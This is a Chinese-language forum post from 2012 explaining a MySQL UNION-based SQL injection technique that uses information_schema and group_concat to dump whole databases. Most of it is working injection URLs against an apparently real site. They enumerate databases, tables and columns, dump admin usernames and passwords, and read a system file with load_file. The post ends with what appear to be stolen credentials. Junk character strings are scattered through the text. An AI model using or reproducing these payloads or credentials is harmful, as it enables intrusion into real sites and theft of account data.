此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似* u! a, C# b( x3 t" ?5 Q( @% j
但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人" K& b$ C' M3 z; m
+ R& z1 U6 t4 n, J4 n' [
' [- k d, C8 }/ D
优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入3 h( _. A0 U G1 Q8 K, Q6 x2 h
$ g8 L4 k- Z& m/ o8 i
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
, v% y& s/ A6 `2 T7 S. s, H3 ^7 r, P* O' `
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
/ V3 J/ l% z P) N1 v9 o1 t5 \ P8 n在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等+ e! |. M' T4 b$ `
0 P% ?9 ]( X7 P0 k
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
" O z4 H) T1 M+ L
2 c! y6 C: d6 z% F4 r+ a! U读出所有库:
! n# ?' _; _# }; T' x) `http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA- Y; r% l- N% ~5 x: e/ d% a
1 u- C! w7 \5 Y( @* u3 }$ `
, @5 e7 E$ t, j6 f* {! s; x
9 B( Q! A6 T( a& ?* T读出所有表:; F) ~2 b8 {# l7 Y7 m$ c
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()) s; g1 L h5 f" C; k* t& c0 P
0 {# G& f% N) a: v3 w9 z* [读出所有表字段:
5 U% q$ F6 e1 A8 e$ ?3 G% ?4 w0 vhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110)2 s, L2 E- M0 ~. L5 a/ c. ^0 ~* r
*/ (97,100,109,105,110)为admin的ascii码 依次类推" x0 q: Q. G1 O3 m8 }
p# ?- `) Z+ c4 s. H# M读出所有表字段里的内容:
( c6 a' C( N) g' U3 }3 L- h# W5 t$ rhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
$ w3 v' u5 ?" q9 t0 M3 q
- X, J3 ^& c% c0 z7 _( p. ?8 x" J* B/ f: c U( h M. a% |4 w
2 i+ t7 b3 @& v5 r: I9 w0 a
; X* X- ?" N7 W' h$ f( \0 ?0 K$ y' `' `0 j* E8 C
5 W6 n4 q6 c' I6 [
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%232 b6 L0 R" E" p& N* U; l
1 Q5 f: w+ i) v6 ^2 j, T0 e7 |, U% q) v
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
/ J9 }! X! E! B* r7 ~1 c
; B E1 h" y# V/ o6 j- Ohttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
: O5 c6 e% }1 W. f
& C5 V4 \! }! \* r( g% G Y7 ?
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%231 {3 Y3 s2 [( ?$ N
7 C/ {2 U& G# L0 P/ j0 A% T
8 H& L2 G2 `8 e( { webmaster:dzb521123,simlab:simadmin20043233
. N! E& O2 e5 {: l |
发表于 2012-9-13 16:37:34
收藏
支持
反对